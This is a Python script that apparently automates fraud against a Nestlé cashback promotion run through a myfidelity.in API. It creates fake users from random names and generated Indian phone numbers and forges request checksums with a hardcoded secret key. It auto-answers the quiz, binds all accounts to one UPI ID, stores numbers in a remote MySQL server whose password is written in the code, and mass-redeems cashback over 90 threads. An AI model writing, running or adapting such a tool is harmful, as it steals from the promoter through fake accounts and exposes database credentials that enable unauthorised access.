import requests
import json
import hashlib
import random
import mysql.connector
from concurrent.futures import ThreadPoolExecutor

# Simulating $_POST['upi']
upi = "9369579968@ybl"

# Random name list
f = ["Vasu", "Nirmal", "Akshay", "Chander", "Rupinder", "Akhil", "Shanti", "Ravi", "Kunal", "Chandrakant",
     "Sulabha", "Mahinder", "Swapnil", "Deepa", "Sulabha", "Neelima", "Vijaya", "Nikhil", "Isha", "Siddhi",
     "Ajeet", "Kshitija", "Anila", "Jitender", "Sumeet", "Preethi", "Priti", "Gayathri", "Dhaval", "Mukesh",
     "Lalita", "Rachana", "Rakhi", "Harshal", "Shekhar", "Rajiv", "Balakrishna", "Ajeet", "Tara", "Chander",
     "Deepa", "Prabhu", "Rajendra", "Jeetendra", "Nandu", "Aniket", "Sumati", "Prabhu", "Vimal", "Indira",
     "Laxman", "Agni", "Kapil", "Kailash", "Puneet", "Pratik", "Pankaj", "Ishore", "Swati", "Rupa",
     "Hardeep", "Prabhu", "Khushi", "Gurmeet", "Nishant", "Rishi", "Naveen"]

hashkey = "*dkaSDs#*k9487ld!*kaSJDsj9784@ADS@197dsk!!dHD@dka267#SD!sk192@"

headers_common = {
    "Content-Type": "application/json",
    "Accept": "application/json",
    "campaignId": "100778999",
    "clientId": "nwHM0EqOVH6c/5J7SZ0w36EXMBoGMIlaXTeL4qN63KE=",
    "appVersion": "1.0",
    "appName": "asknestle",
    "channel": "WEB",
    "User-Agent": "Mozilla/5.0"
}

# Utility functions
def generate_indian_mobile_number():
    return str(random.choice([6, 7, 8, 9])) + str(random.randint(100000000, 999999999))

def sha256(data):
    return hashlib.sha256(data.encode()).hexdigest()

def sort_json_body(json_str):
    try:
        data = json.loads(json_str)
        sorted_data = dict(sorted(data.items(), reverse=True))
        return json.dumps(sorted_data, separators=(',', ':'))
    except Exception:
        return ""

def generate_checksum(data, hashkey):
    secret_hash = sha256(hashkey)
    sorted_body = sort_json_body(data)
    checksum_input = f"{secret_hash}{sorted_body}" if sorted_body not in ["", "{}"] else secret_hash
    return sha256(checksum_input)

# Task to simulate user interaction and DB insertion
def execute_task(_):
    try:
        fname = random.choice(f)
        email = f"{fname}{random.randint(1000, 9000)}@gmail.com"
        num = generate_indian_mobile_number()

        # Step 1
        url = "https://web.myfidelity.in/api/v1/nestle-asknestle/save-user-detail"
        data = json.dumps({
            "msisdn": num,
            "firstName": fname,
            "lastName": "",
            "emailId": email,
            "howOldIsYourKid": "Between 2-6 Years Old",
            "state": "Delhi",
            "consent1": True,
            "consent2": True,
            "isLoginAllowed": False,
            "ssoId": "NA"
        })
        checksum = generate_checksum(data, hashkey)
        headers = headers_common.copy()
        headers.update({"checksum": checksum, "msisdn": num})
        r1 = requests.post(url, data=data, headers=headers)
        if r1.status_code != 200:
            print(f"Step 1 failed: {r1.status_code}")
            return

        # Step 2
        url = "https://web.myfidelity.in/api/v1/nestle-asknestle/save-answers"
        data = json.dumps({
            "msisdn": num,
            "answersMap": {
                "trivia1": {"answer": "Carbohydrate", "question": "", "isCorrect": True},
                "trivia2": {"answer": "It has nutrients for good gut health", "question": "", "isCorrect": True},
                "trivia3": {"answer": "2000 kcal", "question": "", "isCorrect": True},
                "trivia4": {"answer": "Milk & milk products", "question": "", "isCorrect": True},
                "trivia5": {"answer": "Guava", "question": "", "isCorrect": True}
            }
        })
        headers["checksum"] = generate_checksum(data, hashkey)
        r2 = requests.post(url, data=data, headers=headers)
        if r2.status_code != 200:
            print(f"Step 2 failed: {r2.status_code}")
            return

        # Step 3
        url = "https://web.myfidelity.in/api/v1/nestle-asknestle/save-upi-info"
        data = json.dumps({"vpa": upi})
        headers["checksum"] = generate_checksum(data, hashkey)
        r3 = requests.post(url, data=data, headers=headers)
        result = r3.json()
        print(result)

        if result.get("status") == "SUCCESS":
            try:
                conn = mysql.connector.connect(
                    host="136.243.92.92",
                    user="freefok2_nestle",
                    password="Niraj1209!",
                    database="freefok2_nestle"
                )
                cursor = conn.cursor()
                cursor.execute("INSERT INTO nestle (number) VALUES (%s)", (num,))
                conn.commit()
                cursor.close()
                conn.close()
                print(f"Inserted {num} successfully.")
            except mysql.connector.Error as db_err:
                print(f"Database Error: {db_err}")
        else:
            print("UPI not successful.")
    except Exception as e:
        print(f"Exception in execute_task: {e}")

# Task for redemption step
def redemption_task(num):
    try:
        url = "https://web.myfidelity.in/api/v1/nestle-asknestle/redemption"
        data = json.dumps({"redemptionType": "CASHBACK"})
        headers = headers_common.copy()
        headers.update({
            "checksum": generate_checksum(data, hashkey),
            "msisdn": str(num)
        })
        r = requests.post(url, data=data, headers=headers)
        print(f"Redemption for {num}: {r.json()}")
    except Exception as e:
        print(f"Redemption error for {num}: {e}")

# Run redemption on all stored users
def run_redemption_for_existing_numbers():
    try:
        conn = mysql.connector.connect(
            host="136.243.92.92",
            user="freefok2_nestle",
            password="Niraj1209!",
            database="freefok2_nestle"
        )
        cursor = conn.cursor()
        cursor.execute("SELECT number FROM nestle3")
        numbers = [num[0] for num in cursor.fetchall()]
        neww =requests.get("https://nirajmahto.life/?table=nestle2")
        numb = neww.text.split(",")
        cursor.close()
        conn.close()

        with ThreadPoolExecutor(max_workers=90) as executor:
            executor.map(redemption_task, numb)
    except mysql.connector.Error as db_err:
        print(f"DB connection error: {db_err}")

# Main execution
if __name__ == '__main__':
    # To run user creation
    # with ThreadPoolExecutor(max_workers=50) as executor:
    #     executor.map(execute_task, range(50))

    # To run redemption
    run_redemption_for_existing_numbers()